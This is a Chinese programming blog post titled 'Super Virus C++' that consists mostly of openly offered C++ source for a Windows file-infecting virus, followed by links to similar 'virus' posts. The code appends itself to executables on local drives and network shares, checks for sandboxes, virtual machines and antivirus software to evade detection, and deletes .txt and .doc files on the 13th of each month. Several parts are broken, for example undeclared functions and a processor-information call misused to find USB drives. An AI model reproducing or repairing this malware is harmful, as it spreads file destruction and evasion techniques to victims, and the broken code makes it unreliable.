超级病毒C++

原创 于 2025-04-12 15:03:53 发布 · 1k 阅读 · 20 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#c++

#include <windows.h>
#include <fstream>
#include <vector>
#include <string>
#include <ctime>

using namespace std;

// 全局变量:病毒签名和加密密钥
const char* VIRUS_SIGNATURE = "REBEL_VIRUS";
const char ENCRYPTION_KEY = 0x42; // 任意选择的加密密钥

// 函数声明
bool IsInfected(const char* filePath);
void InfectFile(const char* filePath);
void ExecutePayload();
void EncryptVirus(char* code, size_t length, char key);
void DecryptVirus(char* code, size_t length, char key);
void InfectNetworkShares();
void InfectUSBDevices();

// 主函数:病毒入口点
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
    // 解密病毒代码
    char* code = (char*)hInstance;
    size_t codeLength = (size_t)hInstance + 0x1000; // 假设代码段大小为 4KB
    DecryptVirus(code, codeLength, ENCRYPTION_KEY);

    // 检查是否在沙箱环境中运行
    if (IsSandboxEnvironment()) {
        return 0;
    }

    // 感染本地文件
    InfectLocalFiles();

    // 感染网络共享
    InfectNetworkShares();

    // 感染 USB 设备
    InfectUSBDevices();

    // 检查触发条件并执行 payload
    if (CheckTriggerCondition()) {
        ExecutePayload();
    }

    // 加密病毒代码以避免检测
    EncryptVirus(code, codeLength, ENCRYPTION_KEY);

    return 0;
}

// 检查文件是否已被感染
bool IsInfected(const char* filePath) {
    HANDLE hFile = CreateFileA(filePath, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) return false;

    DWORD fileSize = GetFileSize(hFile, NULL);
    if (fileSize < 100) {
        CloseHandle(hFile);
        return false;
    }

    char buffer[100];
    ReadFile(hFile, buffer, 100, &fileSize, NULL);
    CloseHandle(hFile);

    // 检查病毒签名
    return strstr(buffer, VIRUS_SIGNATURE) != NULL;
}

// 感染文件
void InfectFile(const char* filePath) {
    if (IsInfected(filePath)) return;

    // 读取病毒代码
    ifstream virusFile("virus.exe", ios::binary);
    vector<char> virusCode((istreambuf_iterator<char>(virusFile)), istreambuf_iterator<char>());
    virusFile.close();

    // 将病毒代码附加到目标文件
    ofstream targetFile(filePath, ios::app | ios::binary);
    targetFile.write(virusCode.data(), virusCode.size());
    targetFile.close();

    // 添加病毒签名到文件头部
    HANDLE hFile = CreateFileA(filePath, GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    SetFilePointer(hFile, 0, NULL, FILE_BEGIN);
    WriteFile(hFile, VIRUS_SIGNATURE, strlen(VIRUS_SIGNATURE), NULL, NULL);
    CloseHandle(hFile);
}

// 感染本地文件
void InfectLocalFiles() {
    WIN32_FIND_DATA findData;
    HANDLE hFind = FindFirstFile("C:\\*.exe", &findData);

    if (hFind != INVALID_HANDLE_VALUE) {
        do {
            if (!(findData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) {
                string filePath = "C:\\" + string(findData.cFileName);
                InfectFile(filePath.c_str());
            }
        } while (FindNextFile(hFind, &findData));
        FindClose(hFind);
    }
}

// 感染网络共享
void InfectNetworkShares() {
    NETRESOURCE nr;
    nr.dwScope = RESOURCE_GLOBALNET;
    nr.dwType = RESOURCETYPE_ANY;
    nr.dwDisplayType = 0;
    nr.dwUsage = 0;
    nr.lpLocalName = NULL;
    nr.lpRemoteName = NULL;
    nr.lpComment = NULL;
    nr.lpProvider = NULL;

    DWORD dwResult = 0;
    DWORD dwEnum = 0;
    HANDLE hEnum;

    dwResult = WNetOpenEnumA(RESOURCE_GLOBALNET, RESOURCETYPE_ANY, 0, &nr, &hEnum);
    if (dwResult == NO_ERROR) {
        do {
            dwResult = WNetEnumResourceA(hEnum, &dwEnum, &nr, NULL);
            if (dwResult == NO_ERROR && nr.dwType == RESOURCETYPE_DISK) {
                string networkPath = nr.lpRemoteName;
                networkPath += "\\*.exe";

                WIN32_FIND_DATA findData;
                HANDLE hFind = FindFirstFile(networkPath.c_str(), &findData);

                if (hFind != INVALID_HANDLE_VALUE) {
                    do {
                        if (!(findData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) {
                            string filePath = networkPath;
                            filePath = filePath.substr(0, filePath.find("\\*.exe")) + "\\" + findData.cFileName;
                            InfectFile(filePath.c_str());
                        }
                    } while (FindNextFile(hFind, &findData));
                    FindClose(hFind);
                }
            }
        } while (dwEnum < 10); // 限制扫描的网络资源数量
        WNetCloseEnum(hEnum);
    }
}

// 感染 USB 设备
void InfectUSBDevices() {
    SYSTEM_LOGICAL_PROCESSOR_INFORMATION* sysInfo;
    DWORD bufferSize = 0;

    GetLogicalProcessorInformation(sysInfo, &bufferSize);
    sysInfo = (SYSTEM_LOGICAL_PROCESSOR_INFORMATION*)malloc(bufferSize);
    GetLogicalProcessorInformation(sysInfo, &bufferSize);

    for (int i = 0; i < bufferSize / sizeof(SYSTEM_LOGICAL_PROCESSOR_INFORMATION); i++) {
        if (sysInfo[i].Relationship == RelationProcessorCore) {
            string usbPath = "\\\\.\\PhysicalDrive";
            usbPath += to_string(i);

            WIN32_FIND_DATA findData;
            HANDLE hFind = FindFirstFile((usbPath + "\\*.exe").c_str(), &findData);

            if (hFind != INVALID_HANDLE_VALUE) {
                do {
                    if (!(findData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) {
                        string filePath = usbPath + "\\" + findData.cFileName;
                        InfectFile(filePath.c_str());
                    }
                } while (FindNextFile(hFind, &findData));
                FindClose(hFind);
            }
        }
    }
    free(sysInfo);
}

// 执行 payload:删除所有 .txt 和 .doc 文件
void ExecutePayload() {
    WIN32_FIND_DATA findData;
    HANDLE hFind = FindFirstFile("C:\\*.txt", &findData);

    if (hFind != INVALID_HANDLE_VALUE) {
        do {
            if (!(findData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) {
                DeleteFileA(findData.cFileName);
            }
        } while (FindNextFile(hFind, &findData));
        FindClose(hFind);
    }

    hFind = FindFirstFile("C:\\*.doc", &findData);
    if (hFind != INVALID_HANDLE_VALUE) {
        do {
            if (!(findData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) {
                DeleteFileA(findData.cFileName);
            }
        } while (FindNextFile(hFind, &findData));
        FindClose(hFind);
    }
}

// 检查触发条件
bool CheckTriggerCondition() {
    SYSTEMTIME st;
    GetLocalTime(&st);

    // 在每个月的 13 号执行 payload
    return st.wDay == 13;
}

// 检查是否在沙箱环境中运行
bool IsSandboxEnvironment() {
    // 检查常见的沙箱特征
    if (GetEnvironmentVariableA("PROGRAMW6432", NULL, 0) == 0) return true;
    if (GetEnvironmentVariableA("TEMP", NULL, 0) > 1024) return true;
    if (GetEnvironmentVariableA("USERDOMAIN", NULL, 0) < 5) return true;
    if (GetEnvironmentVariableA("USERNAME", NULL, 0) < 5) return true;
    if (GetEnvironmentVariableA("WINDIR", NULL, 0) < 10) return true;

    // 检查常见的虚拟机特征
    if (GetSystemMetrics(SM_DEBUG) != 0) return true;
    if (GetSystemMetrics(SM_CLEANBOOT) != 0) return true;
    if (GetSystemMetrics(SM_CXVIRTUALSCREEN) < 1024) return true;
    if (GetSystemMetrics(SM_CYVIRTUALSCREEN) < 768) return true;

    // 检查常见的杀毒软件
    if (FileExists("C:\\Program Files\\AVG\\avgtray.exe")) return true;
    if (FileExists("C:\\Program Files\\Norton\\norton.exe")) return true;
    if (FileExists("C:\\Program Files\\McAfee\\mcafee.exe")) return true;

    return false;
}

// 加密病毒代码
void EncryptVirus(char* code, size_t length, char key) {
    for (size_t i = 0; i < length; i++) {
        code[i] ^= key;
    }
}

// 解密病毒代码
void DecryptVirus(char* code, size_t length, char key) {
    EncryptVirus(code, length, key); // XOR 再次加密即为解密
}

// 检查文件是否存在
bool FileExists(const char* filePath) {
    DWORD dwAttrib = GetFileAttributesA(filePath);
    return (dwAttrib != INVALID_FILE_ATTRIBUTES);
}
 

Ms_77
关注
C++——超强级病毒代码(坑人必备)
小天狼星_布莱克 的博客
08-05 1万+
坑人坑到极致,就成了病毒……本程序造成的后果作者概不负责!!
史上最强C++病毒(通用加强版&&VS版)
yaosichengalpha的博客
08-04 522
史上最强C++病毒(通用加强版&&VS版)
基础C++实现鼠标病毒(不传播,无危险,附C++源码)
03-25
仅供学习使用,后果自行负责,不得用于非法途径。运行后使用户的鼠标指针满屏幕乱跑。
史上最全c++恶搞代码,总结11个病毒程序
热门推荐
yaosichengalpha的博客
08-04 1万+
史上最全c++恶搞代码,总结11个病毒程序
病毒制作C++(含源码)No.1
2301_76254711的博客
04-15 2581
病毒
c++病毒<==(假)程序
ww_773737473957的博客
05-07 923
我喜欢用c++做“病毒”因为用着顺手,对我来说易懂。当然还有许多瑕疵,比如一些函数还没使用。接下来我们就做一个《观赏病毒》吧!
c++病毒函数
anshuo0835的博客
02-28 946
FreeConsole(); 屏蔽输出。 BlockInput(); 阻止键盘和鼠标的工作。 所需头文件: #include<windows.h> #include<Winable.h> 转载于:https://www.cnblogs.com/lipeiyi520/p/8484624.html...
c++病毒
tico2011的博客
11-01 699
c++病毒
C++病毒大全》
wkj_2014_8_13的博客
07-08 930
病毒》cmd 超级病毒 不要轻易尝试,后果自负!
c++超级病毒代码
最新发布
04-23
嗯,用户问的是关于C++编写的病毒代码示例或者恶意软件代码。首先,我需要确认用户的具体需求。他们可能在学习安全防护,或者对恶意软件的工作原理感兴趣,不过也有可能有其他意图。不过根据常规情况,假设他们是...
C++木马破坏MBR病毒
ZuoJiaWuKong的博客
07-23 9493
一分钟了解如何编写一个C++强力的木马病毒,可不要去干坏事哦!
C++病毒
h20111210ZZC的博客
02-02 388
本人思路 1. 打开后不显示窗口,立刻将自己(病毒.exe)设置为隐藏状态,并提升自己的权限,以搞更多破坏。 2. 修改注册表,设置为开机自启动,并再提升过权限的情况下锁死自己,可以有一点防杀的功效。 3. 在C盘D盘释放autorun.inf文件,一点击资源管理器中的C盘D盘图标立刻再运行病毒.exe(防止注册表修改不成功后无法开机自启,这时点击又可以运行,等于加了双保险,总会在用户不经意间启动)。 4. 为防止用户突然关机,一直使用shutdown -a 命令来取消关机。 5. 每隔一段时间打开一个网页
C++做高级病毒
weixin_70056170的博客
12-19 3753
用上这些病毒,能让电脑瞬间崩溃!
C++的病毒
2401_86836498的博客
08-21 902
C++的小病毒,分为3个部分:命名为“整人代码”、“整人代码-防护”、“整人代码-防护2”
C++病毒(小心 小心 小心)
weixin_71186833的博客
05-19 1841
MessageBox(NULL,"你没有按'是',再来一遍","不按'是'你试试(偷偷告诉你,密码是14588)",MB_OK);MessageBox(NULL,"你没有机会了,正在安装病毒驱动","hahaha",MB_OK);MessageBox(NULL,"输入密码以进行下一步,有3次机会","",MB_OK);cout<<bf<<"%"<<"已安装";cout<<"还有"<<jh<<"次机会"<<endl;cout<<bf<<"%"<<"已安装";cout<<"安装完毕";
C++病毒(无限cmd,无限计算器,锁鼠标)
qq_39176234的博客
04-01 317
警告!!!此程序适合在虚拟机上运行
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值